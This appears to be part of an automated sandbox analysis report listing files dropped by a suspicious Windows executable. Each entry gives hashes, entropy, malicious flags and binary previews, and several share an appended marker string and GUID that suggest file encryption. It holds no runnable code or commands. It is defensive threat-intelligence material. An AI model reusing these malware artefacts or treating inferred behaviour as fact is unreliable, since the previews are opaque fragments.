              Preview:...@..@V.[.....q..03fH....E.......~!t.a{.'7.HN`$.XO.H.}.....?d.w...5..r!.]...`b...z..K?..o.R.u?....B........&.?k....[...- .2.u '.Q.m....)&j......Z@yL...-gD>(.}HA,..o=.&Z.`Z....C.'...R.!".G..8B..@/..s...]V.%....7...tE..m...<.i)|^j.~.#.tS...S.H...WN..d.N.5Pd..O+...]......j.r.....+j..x....s..Q.m.L..o)|.0.T-&F:...C.-.....F...L?.).:...F.d....)E....H.....x-."Z...Q.........I...<.p.(;.b.X'cS...EXL.s.`{x:v...7a.w.UE.2.....b...O..T..\U..Ar...p..gx2VT....,#.2v.E%rj.Ia`.V.;.7....>.".r...e....j.r.x$.*.....@.b.........8Mztv1..%..*;~..........>H.B........s..O.e.....w..x.i..w.s._<.v...@...V...GCo..#...'.(Z#T.......L|......8.AU....(.Q.n...Cej....D.A.\.l'..v.g...uCd.FAjEk...~ud_..Dq...M.;a......]........&...........{s...ai.a.<.T....a.....p........{..X..#...C .....x.P..t..L.......*..8.....R]J|Y..3.....w.CexU8.D.:......G...l./$..h..Wn...*.J..{..._..q.S.O.......r.)..g.6].!`hs.*....eM.$.9Kx.$...Ly....a...?...{j.-.,`W...oX......*3.dn...LuxZ.g..(...TUK.v.)ms.g
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):614
              Entropy (8bit):7.585047315494891
              Encrypted:false
              SSDEEP:12:OZBsBDdvYJIRKH81hcWvhpdXyD/55xkCEg5v0KbN5ukIcii9a:OZBgdvYCtOordALxkCddzbgbD
              MD5:0927019E6DB7987A50C64BE8F9697C0F
              SHA1:6E9E65118A9CB5AF2A4FEFA7C64CE35D6DB5E94B
              SHA-256:3558C04D845637EDB9A0AF1740BFA9A1F003C79BE5D4274FD2C25D7BF5F1B7A8
              SHA-512:D233DEE3B6552DD94F9909A6C19C7A215B8E19A029B789C693188DD21A8BEED5122A2D52387CC6D74C24F282467B3B8D03E400FE1E8643E364E3C2511C42C900
              Malicious:false
              Preview:sdPC.}7..x.....Q.=...f.e.W.yw...].K*..^8.i.......8...I..>.6}q.. ...%d '8...F4..Y...~..IMY[..;..@Zb..p...(C.I..$....v.a.%I"jx.$.,.^L&.^8.6...V.m..W........g&7..m.A.....Z.....{i.{v.R.(v.+D.Cx.`0.e..e."..l.Ar)8wQ..$..v............ .....W...9..H.....G-.:l.......a.C...H..5K...[X......[........]c..:o.%0.s.@.Gz.{X..rd..t.o......E6...A...%(9.x.W.>.r...8.W.o....\z...0....J&f..sL......f.k1q..24........K?p...z.Z..}.$.0a..G0^.....1.=.2..*x...5c7...........B4...}..F=......o.g\....m..h..fLCxW8r.3....V.:o.W..~..l.,..L[.h...b.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):354
              Entropy (8bit):7.321348084267891
              Encrypted:false
              SSDEEP:6:88rIeWu8BIEZnwFEqQ2nWKDlXgwrnMI33ukIcii96Z:D5KZnwHrMInukIcii9a
              MD5:3C8C6D75AEE54C2EE6FF08EA304FC753
              SHA1:5D526BD01AD79CDDE383CF0449961E3BA9214736
              SHA-256:6482ADB8239E15C5D2DEB0DFCE8DE6CA6F47B9427442CFD50AC91A99BD04F27A
              SHA-512:43614BF8522EAF38D25240616AD6E2FC9ECC8D285FEB5A0691C3103C62228556278C9B2640AAC195CABAC3BADD8DCBF085EF3A24E8A5570C5BB01CB8E8FD54D1
              Malicious:false
              Preview:levely..`......_.W3........b....E6..k....7.>..V......dO....tg....Ub.8.<&z:... .D__.=....po...G....>.*l.U....4JM.k ge#.l...lv.T..o...|.4.J..}...6..(......+.2z.c....V.w.......!...c../.A9Lp#.Q.....Z.4b..."T...RY..+.-.....u......TNN......$*..i.;.Q...!z....m..$>....M.Qtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):72091
              Entropy (8bit):7.997534095605365
              Encrypted:true
              SSDEEP:1536:82XdQYcnnVKgllJMbhJvWWOGXnwTTFJ0L52tqgWdmZ2L8Tz6mJifALL:jGvn8Y6uow/7tZr2L8CTwL
              MD5:B2B19DF552DBACCDE02122FF91E32817
              SHA1:4265667890789D2DC269C903EBA574BED43059A2
              SHA-256:E28FFB17FDED35394A249C737298D8C96C29C77DCAE69C911AF0A2E7018029C9
              SHA-512:81507E09FED27A285593E85DE7271F2B92DF397C689F5BE592CED46D7245CAB131092123AF6F8D0A48F02FDC947DDF72A4F12AC6673A99230DDC0080B18DA700
              Malicious:true
              Preview:........pm4.c....ra......'_$B..VV.......J..K......b..%.7.l.S...&V...K..:..L..*...:..tY....<S...J.q$.....flp..jWR..j......X^*..s.^.N......bJ.-...M.$.q...=.L.G.4h. g..1..Hb.??!P ..p.....<)Dh#,.:..Zu......8.$w...|......z..nLUQiRH].*...6.......D.T.F.........~.7$.i'.Y.....+.o..yGw.<4\..;\..;...:...b+u.)....R..\.|X.D....~...`.Pt0.Z.{...;..W.(2...............,.:..2O0.....W.C..AL.5m..m/...jX..JI.mX5.(."....z....A........h....tZ`6+3B.4_......zB..4..`8s..J2..t.....Sz'...].N.^A../;...I..\..(....D'..:WS.p'.d.c...A.Y..v.4.]....b.....D.2....D..f..T.x.3#..".L.VFM.T(d\..r.df...n..A.i<;...U=..}.pV..*r.X..}^....."Y...M....D..........8..y..&...<[.Q..j......`...[F....H0\.Jn...8..W.(..oS..#.ky....G.;ChS.K..S...G..A(.[..jk.7..../.4..."1Ed*.. Pf[...Y...5tK.Lj..m.>.;..k.....G[..)B.t....T0.)....<..S.<7.&.".*.Y_L..[k)Cb.a..V....Z.C.D..d+e.p.... #..........B_$..$.UKby......h..5._.N....D$.....*q..X......~..v..y....r.x*+F1$......z....8..D......hc..o..X...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):45390
              Entropy (8bit):7.995640649225437
              Encrypted:true
              SSDEEP:768:Wj1rcQjj92atc2gdgx4YBEQu0h4IB7FMx5p6Q345/Y3fl6FFqZd:WxrcQd2q8gXBMc4IB763I5g396bqf
              MD5:A4B10860AF4DBA018A29A653844A2458
              SHA1:4AE3B492B98D71E0FCB9C9A907FF70FD11CD0FF5
              SHA-256:D2F4E0B29EA97F81DEEBB0033DFFE07E21DF17CCBC2EFFB61A522FE7192BD4DA
              SHA-512:6F7BF906026D15777223A3408DC619FC8F40C7387A790366DE246C4BB1B999D59133A2DB541343E833D856888B83C7362411B7B957D12E48E0A1EAB253876AE2
              Malicious:true
              Preview:SQLit.H.....?.0..%T6.>~..h#..W......B..UJ..-Z..G...oeh. ..E{..2...R.iB...,.'....l"1....]..Ct>}.02.O.8..j...:S..p..."[jZ.Mv.|......6/....=7n..=....:[dOBj_h..... ..\A......f^43.1.@.?!.`.MP2Q3&.&_.3P.W.d.y.!w`......1].1.8E.M...G.lZZF{Tc.Dy.[[.L.#...............W.>..5..c..z.Y)t.l?ZZ......._p..m..nz..._ Q..NE..u.s.4...L..J..I..t.8...w.........Q.+ps.{D.Q:Z...t._.g..2v9`......7Eb....]....Q3....C&..O.R......p......Ad)..._c.cK...P..&$ZF.2d^i'..+j.Qs.........."....F...0.`<...r[..XO....K..n.3P....s..U. fY.Wp..g/....p_?{..6.....0..T...H.zPJ...Ql.w.!...*.&I....?..l.y..^.9.y._..s.W|Q.......U[JJ....9......@.y....W.....I..NC.U)*..I.3..+`?.G..Q...G......_,.O.>)..4..F. ..L......tE ..f..........b........t4}....r..^..t...%..Ho./. .....~.~.......>.*O. :. g..g..v:..V.y..\_.zN)M.&..^..o..a<...j.AO4..u..-H..G.:tqQ....kp..U..6..:[W..k...C}..'..w.H.c..[j....n...w.>.Q...Mt...qC..D.A..r ..=(......"g.J....- .%.n3...q,....VwII9.....#.B..0.....f......U.Y.S
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):503292
              Entropy (8bit):6.44558043567815
              Encrypted:false
              SSDEEP:6144:eNwgHLeKALZvdrUA236KOab7Andp+6f2B:eNryxPO1paL+6f8
              MD5:B440A4BCB3469EA8F7D2DA2B235BC53C
              SHA1:41FF2734B59E6C12547C9FC4ECFF82EBFAF64C28
              SHA-256:B95D3293A8667401B6F815C67DEB982B4E3A2ECDDAEDAD4ED4DABA05936761BD
              SHA-512:CF35497510D1D5D50ED6BF6109AEAD88A87810D1DA2D959EF9B17DEAB7450497AA6870D40ECD7029ADB54A6660ED0A46ABF15AA2A4558E491BCB21405FABDB9D
              Malicious:false
              Preview:{"Maj...%+.GX.....5......]..B.^...."."......Pj..=...aF....&.].9..?r`(...y!>].....5.=..2...*.U.1s.g..l..v-Z`.F.2.C.8.8.)..[m..'..,.M.._fKdzX._.`."e...:.#L`.x.{.O.../......-....,......L..1.5..b.......p..I...[W....j.0......T5n5ER.(..E......:e...._/../3Wk.C..?.IW.6.'..=.e..Y..s.....r..GG...Ff1....6.{.f.....2.d....1..J...8.X....b...!.8.=..#..p.j.U...P...Y@P...x!./....GmFe...\.5....B.t}.k.^...w....d..AU?.RB.N.D.)...)...hn#.....~..... .....^...&.'....f#p..NR.X]}.%..Z..5..=....6.~..~i5.He....v:....0w2.'.1.........D=[.Bq...2.....Y...x.7<.w..._.......x.........@A<}..hm...!.CNm....@.[+.H...........wl.2.Yb...s...`r.bw....x.x.<..!7.vr{.....H..^>xAs0`em..^....v......U.&.;~..!..y...+A..[...7q......CR....*.-.x}^}#...ik..Z.y^@P.m......."...bG.?_nK...?.wg_"xA-x9;.E.x^G.Fm^.X..r.....y=.4.u..E.cY.syu.Z....Sc%.Z..:l..4.......&..6.e....Rd.J....u..>V..f...<.=+;.8(E..4...x...K+ZV...(..h[>-x.oM.V.w<O|.E. KEb..m...r...a#*7.>m(S.0.c.B.0JU.]P..>.|..up./.7.......
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):759166
              Entropy (8bit):7.068977925055142
              Encrypted:false
              SSDEEP:12288:HzR+6EpIMT5KXHyheIQ47gEFGHtAgk3+/yLQ/zRm1kjFKy6NyjbqqZyU1ovpPqxB:Ht+qMT5HXg+1kYvN92t
              MD5:4AAF9346E88CD9E53376F380170D0A01
              SHA1:20E1798F5A66C52BFDCE10D68ADADE421AD946D3
              SHA-256:FF81359E1B95B0CB6D8D09540ABACA539AFFB2E5D652EB129A95BF979DBBDEC5
              SHA-512:95B5A30222AB195E2CBD8961B102E2FE5CF7C57205A2C72A2A49DB1D62160F9CC8052D04AC9141A0009D955D368F06B95C139C04AECB3CF71F8D86BD41D7DA52
              Malicious:false
              Preview:......|f_.U....A.5.j..A.B.f...7..lC.?.m.'oN......d*,.\..Q..>..C}..? \m.r..K...}#.)..wG..l..5.."u..3..._..Esw.PV1..z.Xs.3.^.g....M>(x.B.Ex.7.c..!.>4>a.u#*5..`..Oo...f......U\......h...w....fkB\....2,..Qy.~6~..!.s;QA.~.M...8...T)..F...h..........B....Hhh5.k].V.s;....8.....p..6.9.....s...,D...0...%.9t...1%.0....~.r...}..n4..(.lXy6:^[..=..E.`.....+;...K.<G#K.#A.14_L..g01_..4P.......p.4G b...7f.f/..T.x..Y..VO` d..m...^.9.<4...!...)..G&......=......Z8_Kk.g...Z ..D........A..qD..S.Y...r.y.`.`....E...H4.....&X...R5.2gGl.tGPq...q[.H`..rq..|...y........ar.VR...l.EK.n....y. ..aD\...II..n}..x50..#..x-".......B.734.).?fq:?rJ.$.....j-rl....d.[.Q..L..2\...id.!i...&[.~..K..s..8./.B..x.....@...3z..%6N.t.M.....H`...B:...F)/..B....Ty~L...vV...v(..p.>}...\"gj.....x%.He.`......jwV0...2.A%...B.W.7!F....2..,..?F...."1.VI.S.=.xxj|...z.f....n.9..^..sW.(w.....1./m.......n..S!Nm.Yn[.6..a.q.O..\.G|... z....az0w`i`LGf.KL.d..6..=0....5i......J..Q.F.....4.2.7V7.s.S
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):582670
              Entropy (8bit):5.268259849509629
              Encrypted:false
              SSDEEP:6144:uKWA/+tFjXUkWnh8hVyZKfu/H/KT8pNbGNPLRdMlduU6/24JG:HWAUFjXUkjf6H/KAutubcJG
              MD5:069E333F2C729ED39442C0A5BC333E45
              SHA1:EE763DFBF23A7B54C862FD0D20CD47AB544293EB
              SHA-256:EBCD83D813ECA2319C6E43DBD95AB94790D3AE9EADF4FD53340EE7061B704F81
              SHA-512:E92E2E11C05015B0E93F92CE4D5062B3493A41836A063D547C3DDA5F0F85FD1323C603CE1F08C4FA25D130208EBA860003788F6374E2920776CB570147CC3FD5
              Malicious:false
              Preview:.......C.......(Ri.....x....... <n<z....#......he.J]..Q..x.]....E.....V.W....-o..!...d.E.'.f.u..%....g4..e......~...0&.#.r0.g.%.(.'.X...4.[.lF.6..X5UpQ........:..)V<.*.Y.j.N.N..t..q>..h..i.....N.j.M....[6..JII....1........i<"1^H9...............2....rVD.I......3y....<.. I..... ,.E.*...L\.b..Y.:.....cg.v.+.....t.MK8....~...}^..?.w..Zk~....Q....R.....tN{.[G..$.._e#..g....t.x...h.._rV@.Y:.....~..%..ru*P~..Q9oj..F.|6+V`]..fh.44nc......g.%F..<D.."....p...9.?0..6|..x'.I*...e..\..w-...[..-D....l}....O.U.b.#)(..........z_.....K3.Z....M..Jj...(..\}F.V.v._......:.F ....C...Q.4j...3.`.k.....1..`b_J....m.S.l.[.m..[..B...O.Z...R......{..~......H.-[.....Z....v.\rN.'.u...E."..+..L...h.o....U{5.3H.\...`$...xo..M.3...e..1 ...|\B......K].S..j.u....J...C.Iv..@.1.<.bt;O.9...y=.2...!...o....w.E.%....QM.9)I....AE'.....[.,m*..z=..Nm0#E .....CI..4....B.........mT.V.1.\y..Nu.G......vQ.n6...[.8..I.%5..#px@.....-H...^T.[Y..lCI7b....a.g..t.....T.i.....{k...k:K...#.Z'.9.)
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):6906
              Entropy (8bit):7.978241332540441
              Encrypted:false
              SSDEEP:192:AemQPHauRnyVRfLjrWfYevWqebhcDYJW8jFy:JTxyVR3rAYe3eODYJa
              MD5:5D79E26EF3142CEA476E38098D185E7E
              SHA1:9855909795245E433191421394935C6A025E634D
              SHA-256:D3FB69F6CC05C2262086340C7A974844B1B7DF7ADEB8027B84625D59E6D7AA8A
              SHA-512:A28A2B64528A49898AFC955FFABFA312C5CFAEB50870FA9FE3A31A5E017BD7D19D607834033EAC587A9726C02C32C6440CA2B769D585039A368D9C9B91B4E515
              Malicious:false
              Preview:10/03...I.m..%5....%,.*.i.y.L.rW...A....[.Ea!B(..iZ...:6.o>..(.%x7.~W{.Gq..v....W...e.\.T@..N.Q......y.X....v..[.Hp.+.v.u4.H.5v.....g......W.L...X...<].y...,....^......=.s*A....R....%.z.N..........X.o.P.@C...v.NO....P...F]....s...._.F7..,...T...)...F.+Qt.@.u.y.:>(.o..Kx.[.1.[..w.@`'h..'..!......P#......5X..1..pE....M"j.P$...[..H...m*..)K..7q..).0[.P.].eW.b.Q7e.`.m.xP%...>.7WN...!9.(..__...;.8..F.=xG.(.V.....tX...Z.!.4Bpn..w. ..5w..y...r.#].....I.$....@..o^7n..9......._...bD../.(..hD..|...G.L=.%...J......BF.$*..a.....vr..A.3...M.E..S..DC..:.$4..y._Y..yt....O...Oo.4...]Gc.#l.....+..?......m...d.b.].uE.i..3{.j...l@..xdk........{~.7.,FL.,s8.r.N.....E\........g..D......{t.Yb....6.Hc...cw..#{...D`.04l.+t....N....K..:n.Jh.J].9.....:A..jh.z...K=.'.......a.6gx.*..(.jf)..g.....d.cUG:..V...V%c.F.J....q.$fw.!.. .....kt......?...uj.HA..M+..R..S'...H..."*.....g..<.<..Q{.[mBTd...z/O..ds....(.X.t.....8].K%.R......>u#..)..s.=. N.h...MB.#..f.,.\.X.j.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
              Category:dropped
              Size (bytes):834
              Entropy (8bit):7.726228811701058
              Encrypted:false
              SSDEEP:24:QeVKRSLaN6h1XXU5ADeE39zMfD83UZUvBSjTbgPbD:x1Lache5A48k2+0TD
              MD5:214B0F42E7D97536BFD19ADDA7A4EE58
              SHA1:8620A978FB8F4AC19A642B51DADEFFE12082E907
              SHA-256:1595B7DA7D1B0BAEA929DD2AAAB96D9C2ED411DD305386431D4D9C4E743BDF3D
              SHA-512:6564B0BABBB4B6D7FB306D5AB84410F76BDE1EF7482E518CC9104FEEC7157FE12437BDB8A3A2915D621000E4714028FA9E8FF5CFDFD6AC0F0398500441B2D522
              Malicious:false
              Preview:..1.0....K......+5.....h3........*...Er...%q......5..h..Y..w0.?....q.=f{...QL.;.i.u..J.g.#j..Q.y...=.2.yZ..L..(6.{.;&.4Vf...>. w+.H......F.D$.e....m-..JGI..k@o..X38.KBu_C..HBe.. ).&.7.4..F..0.N..s....9N9....._.....8....X..H.?...2.I.....V..k..t.K..2l.9.h&4..6#...P.{.6t.y..q....1.[G...s).J O{...\.m;...F..~a...2........'+...R:8~..5.O.ku...L.m.b..T...#}i...=..r:'..!...*....2..;/D.....L3......6a...e3\g{#......8c.mWC.3..]W..k.n....(.w.M..h0.4...$..u-.fa.}.K...X..7}B..J...J.,l.G.^..L[p......iR.j.Y.g..d .....0G.B'b9.3..u.+.w.\.7......+...j.yZ..........R..(Ij..o....oY...........J...d5..e.{%LU.....Yq..........+).f.q.U1s.Sl..T].&.5nj......F.....e.!....%..........b$$i..4..Fu.W.....+4s\...$d.v.......".1.'......r.....gE..,N.O.[....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:Unicode text, UTF-16, little-endian text, with very long lines (869), with no line terminators
              Category:dropped
              Size (bytes):1740
              Entropy (8bit):7.886340708949196
              Encrypted:false
              SSDEEP:24:QXFW4CzteXAAcd9YUTc3FXayqtgzqKrQ+f7euXiWDbMCFUnfu3kEv0teYnlleL4X:YFW3WANcICOMeuywbMpfSieElleLiD
              MD5:6A740A72349432132E6BDB95B97F2601
              SHA1:9FBB0BD8860E642343EEB63B14F534F19A5B2689
              SHA-256:59FA03170A2E8251DCF48CEB740F73B7BC1055F8F296EC30EA5DB2FAFE154FD6
              SHA-512:F45727DD7D690F39968D5451B8E28D559752551E8AC7C58483E446B0709DCF10132A6751B5262033CED47FFDD52ECD53A7D02A5FD3DD112F161A56A5D7E99644
              Malicious:false
              Preview:..1.0X.17.B.-,+.Wg.....i$.?.J......D.|N{....@k^....{SP.Bn$s.W....Q..'..T...`.&..........u,O.........U/.u}k.N.~..........Be.6...a.r3J....o(4.. ...y}..u..YvF.c..>N....~Z}Je.ckb...a\"|...B!.or.3y..Uw..........=n.0........S{iX.....X..r/X./C..Q.P..$.~..)y.k..;.e.$......&U..u...(.-.?N......c....j..].....?....../.sT......9.V....f.7.'.|T...8.0..r.V.FB......f.4~z.Q.,&lB.y.\]......7.$:.~......E..b....3.n"...rr...)...k.P,.........*.. .v\..|..y..mXsBQ].-7Y^.pC\.3.q.'.k..3rwsK..?.z._<..O.....z{....! Z....\..h..G....<..........e>h;..*z..S..a.=..'.z7S)u...>G..).c..+.../.jC.....GMM....7.K...qR..nN.T.9>...P&c/yD..j.Eg*....M...5_.Mn.u..C.Y....V...jo...m9.<.....^..y!.$.......M.2G9.....Y.....C.5..iQM...q.V.....%.)......P...QKe.n..K.X.`..Z.....S..j...<.^^..@.r-.....A..9.....+Dsw/..."....m;/.t ...Lu..KE...s.@.......GEv..A..1<f.J.=..*v{A..D_F.4N..'.5.9...>'5i.<.....c..f.rKnK......"Ja......)..w'<......$E...[.5.L..!O...)h.'.j!...#!...GJ..6...[.$3.O-....../........
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1294
              Entropy (8bit):7.811486572791136
              Encrypted:false
              SSDEEP:24:YQk5ZsgPYCZscKyOFn0KsC4GKFNt6VmYxy8j1so/41urBjKbD:YQk5iPssmOF0FiAAVtx/4GNoD
              MD5:96CF3F2D36463331829F22CB84A90166
              SHA1:FE37CB7697DB77158907B686A5895DF9C84C4B52
              SHA-256:13ABF62105D7CC43EFAA8971E09112F3FF25CF139670487891F578C3E4136F06
              SHA-512:A486905160B274E5B8B871CD0CB81398D8335559152E763F8780351C8DD44F51C144FD4BD025D066A43C2F6B97298E8AD04C8F7304A8FEEEF5B2FE5E91EBB817
              Malicious:false
              Preview:{"Cam.V-..n/..iTs.}.n...Dv$.,..9.......h.d..4my..,!8.....>.t..e.......x.......nh.....H.X.i......_..b9..H.....Q`p..6.f.3..M*..q#U..n@....D..,>....Hey.BC4...{`h^.A.:.(.B3.CRD..d.]lY;....*YJP\C@.....*L+g.....*QY....:.lXB..y...dc.|...q.2l...`...g..;..x..4r&.v.....ao.p.....F[^bU.....g.L.."..?]C.;. @..yrj.Cs.._.Gq[.9,i'-...pOD.uNwC.N*.x"hsUr..#..p......"...``!u.Cj....s.O....>....b....?s8......:Y=...=....0kJ9...!M...z..p.'......l....2F^..F.._..u....d.f..&-;..y.....J.v..J....y.......C.P_..k.W.;.<E._.....}^!....\.yyx:.J.>g...3m5z...XC..+.......^`.U;.....V.*...^.=.~..8.7..k.(qZ....C..=l...1...p..P~/.>...7...6.. OqX;$w..j.\?.c..z.e-d.d~Hby.m.^i...7.Mx$.7..P.QRkP...;..n.S@...^R.!.-k...:F.5.U.+Hw...Q.*..#'..6..=N)G.X.....).Z?.}..ax@>H;.1)A....&`..Y....a.%...I.(.....M..1$...@.6}.i.....)HV.....b.1.o.y.2..Y.._....1.0"..`..w..`1Rh.S=f.{.S....0....k.8....)G.@%.&EK.l1.e.9..M..qlr..VbW....I.D......kQ.5;?...FC.....j.w+..p9'G.As..`..29c.V.G.....6.".....l.&r.l.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1074
              Entropy (8bit):7.80150499148629
              Encrypted:false
              SSDEEP:24:YvujHnHdLTLdtu9F3+f4WkdtezhTRlJ46iSEo8TbD:YvujndLTLuFWkIdlJ4nSAHD
              MD5:F61A5EADD69F3D36022402A8307F1C1F
              SHA1:852E5EBE68437635684638E4A3B6BB9BAF2A3C9B
              SHA-256:AACAFF3C6C8D23C745E8A40C1E4805F8448D2DD57A1F2E273E9E04F38DB09C69
              SHA-512:A0242256A81E89B7583D909CC7243864403D65B7072ED8984C8D76FF81B06B680DDDEEFFE53C2EA2C957BB01B5CC6AD368FCAED98B67994D947847520317E173
              Malicious:false
              Preview:{"Cha..]..Z{...#.B...M..j.v.+*.2J|...7*.u.N..K.P..X......rf.,....)}^A..m.8X....B...p.[..1..y5UP...p.t.1..'<...k../...6.JD.^>O.X.^...7..f.R..[........M.W......./.@.".!.....H..k.XnB\.f.?G.n..&.B...2Bt....BU.@.......R... .&...j...%..6......i9./.J.m?R.#.E...n....WD..v...N>.4Q......`Qb.L..i....nj!`G.d.u.O+7......x..y[..a....9Wd(N|.O..$q....v..m5.`.V.~U...D}1Q*5.iV x...u`.F.s4.(shU.!.<..R....]..)...#9.....s....tw..*[....._.4.ZM.9.&.@..Q..3....ib.v?@.._.)Z/~QS.C..il..-x.-.@..]h....[2..l9..V.#..........-.B....h{....dsS`...(.....e...d.i...?..J.......!Q.h.r\H...s.".%...C......u..p3..}V{.p.R.)...w....'..........).k..../{@.5&...HM_.....acS.x..Ct.........~...B.4....yy...O.{..fX.^)9.?.\%.AD p.Dx.m.....e...D.j.x.Uj..p..Q.... ..j.k...h..W..;).B].Q.n...6.1.%{p....-..B.@.gKg....)0?.....DN..Kla.,.F....p..).. .V.$.C..~.[.......^vBz.L.,%`...!Y=A....:@P.y....R.!....w..jp.v.e.<.4...Tp~.$......A..........*o[...uh-`.X.%..L.K.d.N.!.X..~..r.A..'.....Xxtp8q
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):421
              Entropy (8bit):7.322470070735872
              Encrypted:false
              SSDEEP:6:Y2YRTOpxZ+dK/pyviLFuuMujIIpk+B+6C55+K105YqXqS8qIIa+2+6CjPXh4E+PJ:Y2Y8pxzOkjZB3cZ+6yPg/+ukIcii9a
              MD5:02AA71CE7A24850ADB5DCED005E06308
              SHA1:E02B9FD61BF7820512333E68024B617111D4AA75
              SHA-256:FDD9745CD728F868308BB7FAFB094B9EDED617F7B3B71C27A7FBE45B084C6CB7
              SHA-512:84B2454EC40122760BB0FFBAB9B4823026349F77F8C97E9F853B70E254DC7CD6CB4ADBEB7C3B1195AD4E97BAA5411BC37DF4C0246AC662FEBCED3F147869B5C4
              Malicious:false
              Preview:{"Sho.).{..m....q$..K.p...^..W.~.X%.d..|.A......{...^...q\7M.}d:uG.xsh.kOt...28.g"b....N...w..s'U-...Q.....i.*.j...AD.t..*....f.,.e..v...2.`.8.F..S8.WR\.p.-.......6..|.3..A.-}.q..tzC.Rlk7...\......b..'...L..VSFF3.z.hR..........a.|..H.c.."{N.+..Z.......K...F...."...H;R{ 0..p...~.b/'MjzN>.?.l..q1...z.\q..h*........P.}...w.M6..|tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):348
              Entropy (8bit):7.269941764695237
              Encrypted:false
              SSDEEP:6:Y2QTk7SCeWRSSzYE34rAWOTmukLrXrfx69C7yVcF/5+3ukIcii96Z:Y2cGSQYM4rEKrrZWOFhuukIcii9a
              MD5:3290BFA0A0D35ADA527533348A7B5A7E
              SHA1:439258CABD56832EB17BC8EC9E02EB88D347C15E
              SHA-256:565E07E6F73D8099CEF05F985C5DFBE35AA9CE002CC753C261326B27FF5E5F65
              SHA-512:3D53BE4BD05B8D2CFD9CDD3A766D33DDEB0B20528AE16990E2942CCDDC78BF7B34E7F797FD73A530914515F851480E240A484FE30674559EFF643A092DA33DDE
              Malicious:false
              Preview:{"SurzX...2j..-.<.e............Y..FCXl....~.;#..P9X...w.....xc`.x72.r...&.a....I....g*......6..d...._...........u..91.qa.$.........+..K...A......Q..P..a/&.d",...z.u...}..R.;[..r......6mf.&...A..I....-\M.v.}.`C.eZ...p.o7./;.....@4U.......x...%.m9.............tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):348
              Entropy (8bit):7.291587921564871
              Encrypted:false
              SSDEEP:6:Y2Q5QE1UuZqzyfG91gJ3FGTZyPQYSEgQACRBqgh7dqtrZGbdLkOW+3ukIcii96Z:Y2wPUuZqzQ34GADgh7U4bdtukIcii9a
              MD5:38A34869658CB295CE999379DB9757E5
              SHA1:0342BCC4C37AF6822DF6149EEC75D7E372421310
              SHA-256:716AB322CAA005BDF6D20691060BAE8DE1AA2F971F4B605236AF738CDE0C8185
              SHA-512:A5C3167DB5650D2BB2B0E5EA76030D67619E15CD606953A21E77173132D49C59AB0D98E885D21E43338FDC7F9C2E7C835FDB33E2A70B1FA59E8130E0CB6A47E8
              Malicious:false
              Preview:{"Sur.}H......Pz+.".o....K.s....r........-Di..}+.~3./E.....@zc.....$..^...W.X...=.35....bk.......9....ql<...O.u..O...A.Be....)6?..6.1.l...]1.M"......k[.M.O..7.F@%g1.Q...!Mep%..Y..;.6..R*.Oi.fP..E.....pBH(...%`.N.%.,..,...gVF.......c..7~8.....wv.]....k3Rj..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1333
              Entropy (8bit):7.860272643365503
              Encrypted:false
              SSDEEP:24:JeidJB4WxeU7IwrQ4FiokRJjVJGtvBksbkTkbD:JBzB1cU7IwE4sJjV0BkTuD
              MD5:7A528FD1BAE22C4490F610D619F1CAB5
              SHA1:D483E864A68B8470C27D23AC43427A443C89F671
              SHA-256:249A6432ACA5EB8C4CE7D91ADD7D0A429FD58EA7232BB2E2A5F0F9E7FD430F5C
              SHA-512:9CFFFD4321DFE4B25ABDDB583D3C27F622D389A00A8F2C2BFCEEB34D9AC8EE3D68A8E1E2880E939B171521B4FBEF27A9C6F16F3140A43D10A025CD0C11C3DC37
              Malicious:false
